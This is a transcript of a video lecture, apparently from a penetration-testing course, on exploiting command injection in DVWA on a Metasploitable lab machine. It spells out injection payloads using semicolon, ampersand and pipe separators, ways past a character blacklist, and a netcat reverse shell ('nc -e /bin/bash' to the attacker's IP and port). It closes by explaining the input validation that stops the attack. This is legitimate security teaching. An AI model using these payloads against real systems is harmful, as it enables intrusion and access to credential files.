[00:00:00] Lecturer: Welcome back. In this video we're going to cover the command injection vulnerability. We already know what this is, and we already covered some type of command injection in the previous video, once we exploited the Shellshock vulnerability. However, now we're going to do it on the webpage itself. So, do you remember this example on the screen that we talked about? Say we have a website, and that website can ping an IP address that we tell it to ping. And it will tell us whether that IP address is offline or online. Well, we are going to take a look at this example inside of our Metasploitable. So for this, you want to start your Kali Linux machine and your Burp Suite inside of your Kali Linux machine. Now, we won't be using Burp Suite in this specific video, but nonetheless we must have it started, because we connected it as the proxy for our Firefox. If it is not open, we won't be able to visit web pages.

[00:01:02] After that, you also want to open up your Metasploitable virtual machine and check its IP address, and then we want to visit the command injection page on our Metasploitable machine. So go to your Firefox right here, type in the IP address of your Metasploitable. It will lead you to this official page, where we want to go to DVWA. Let us log in with the credentials that they give us, which is admin for the username and password for the password. Click on login. We don't want to save these credentials, and we want to go to the command execution, otherwise known as command injection. But before we attack it, let us go to DVWA security and set the security to low, because right now we can see down here that the security level is set to high. So let's go right here, check this arrow and click on low. Now, so you can see everything better, I'm going to zoom all of this in, and once you set the security level to be low, you want to click on submit. Great, now let's go back to our command injection.

[00:02:12] So as we can see, it tells us that we can ping an IP address for free. So all we need to do is enter an IP address and it will give us a result of whether it is offline or not. Let's give it a try. If I type, for example, the IP address of my router, which is 192.168.1.1, and I click on submit, let us see what it will tell us. And here is the output. It seems to work and it gives correct results. My router is indeed up and running. But if you take a closer look at this output that we got right here, it seems that this is the same output that we get when running the ping command inside of a terminal, right? So if I go to my Kali Linux machine and I open the terminal and I type the command ping 192.168.1.1, and I only want to ping it three times, if I press enter, well, we pretty much get the same result right here. It will ping my router three times and it will give us a similar output to our Metasploitable page. What does this mean?

[00:03:25] Well, it most likely means that this webpage forwards the command to the server, which in our case is our Metasploitable machine, and then that machine executes the ping command to determine whether that IP is up or not. Another cool thing that we get with this page is, if I scroll down here, we can see "view source", and this is the source code to this page. So, we can see whether they filter the input or not. But let us not check the source code yet. Let's not cheat, and let's just try to execute command injection and get it to work. So, how are we going to do that? Well, we can try to execute two commands inside of this input bar right here. It does ask us for an IP, but we can also try to (indistinct) another command after we specify an IP address. For example, if I type 192.168.1.1 and I type dot and comma to separate the commands, and after it I type ls -la, which stands for list all, including hidden files, and I click on submit, it works. It gave us both results from both commands back. It pinged the router first and after it, it executed the ls command.

[00:04:44] And we can see what files our target has. This means there is a command injection vulnerability, because this is something that we shouldn't be able to do. We shouldn't be able to execute other commands outside of this ping command. So, let us try different commands as well. So, let us enter the same IP address, then dot and comma, and then "whoami", for example. And it does give us the output of that as well. We are www-data. Okay, but how can we exploit this and gain access to the target with the help of this command injection? It's quite simple, actually. We can use netcat for that. So, if we start a listener in our Kali Linux terminal, if I go right here and type nc -lvp, and then I'm going to use the good old 12345 port. I start my listener right here, and I go back to this page and run the following command. So I type the IP address, then dot and comma, and then nc -e, where I tell it that I want to execute /bin/bash, and afterwards I specify the IP address of my Kali Linux machine, which in this case is, let me just check it out, 192.168.1.9.

[00:06:04] So I specify right here 168.1.9, and the port is going to be 12345, which is the same port as our listener. I click on submit, and if I go back to our terminal, we got the connection right here. So we exploited the command injection vulnerability. We can run the commands, type ls, go back and switch through the other directories, and we can check out all the other files. Here is the password file, so we can also check out the passwords. We can check out other commands as well, and everything works great. We exploited this target. Let us exit out of this. And now that we successfully exploited this vulnerability, we can take a look at what the source code was. So let's go down here, click on view source, and if I enlarge all of this so we can see it a little bit better, if we take a look at it, we will see that it didn't really filter any user input. They just requested the IP that the user inputs and they forwarded that IP address to the ping command right here and right here, without any filtering whatsoever.

[00:07:23] That was a big, big mistake, since because of this we were able to gain access to the target system. Now, let's give it a try on the medium security level and let's see whether we can exploit it then. So I'm going to close this source code, go back to DVWA security and change from low to medium. Click on submit, and now the security level is medium. Let's go back to the command injection. And now that it is on the medium level, let's give it a try. Let's just start with the same thing that we did previously and try to execute the ls command. So if I go right here, type in 192.168.1.1 and then dot and comma, and then, for example, ls -la. If I click on submit, well, nothing seems to happen. It doesn't seem to work anymore. However, luckily this dot and comma isn't the only way we can run two commands. If I go to my terminal, if you type, for example, ls; whoami, it will execute both of these commands. So it'll give us the output of these commands and then Mr. Hacker as well. But you can also do it like this. Specify these two signs and then whoami, and it will do exactly the same thing.

[00:08:39] So let's give it a try like this. Maybe they filtered this character, but they didn't filter it like this. If I go here and type 192.168.1.1, and then these two signs, and then, for example, ls -la once again, click on submit, and this will do the same thing. It will still not work. Okay, let's do the same thing, but just delete one of these signs that we put right here. If I show you right here, copy the same command, paste it right here, and I remove one sign, it will once again execute both of these commands, just as two different processes. So it might execute one before another, however, it will execute both of them. Let us go right here and give it a try. 192.168.1.1 and then one of these signs and then ls -la. Click on submit, and it works. We get the output of both ping commands and the output of all of the files inside of the current directory on that target system. So, the first two tries didn't work, probably because those characters were getting filtered and blocked. But if we specified it like this here, then it seems to work.

[00:09:59] It seems to bypass any security and it executes our second command. So if I go down here and we take a look at the source code, I enlarge this so we can see the entire code, it seems that they created some type of a blacklist right here. So they removed these characters and this character right here. So anyone that tries to specify a command injection with these characters, it will not work. That's why this is the medium security level, and you need to go through a few more commands in order to bypass this. However, it is still bad, because they filter some characters out, but others they don't filter at all. For example, besides this one character that we used, we can also exploit it using the pipe character. So I can type 192.168.1.1, and then the pipe, which is this upper line, and then after it I specify ls -la. And this will work as well. As we can see, we get the output of the ls -la command. Great.

[00:11:01] Now, if we were to change the security level to high, I think I read somewhere that high is an example of how the code should be written so it isn't really exploitable. You can change it right here, you can submit. And you can go to the command execution and check out the source code right here. It seems to only require integers, and it checks whether all of your inputs are integers, and it splits the IP address into four octets. It does that first, it splits it right here. Then it checks if every octet is an integer, and if it is an integer, then it combines those octets once again back and it pings that target. Okay, so we have covered the command injection vulnerability, and now you know how to try to find it and exploit it. In the next video, we're going to move on to the next vulnerability. See you there.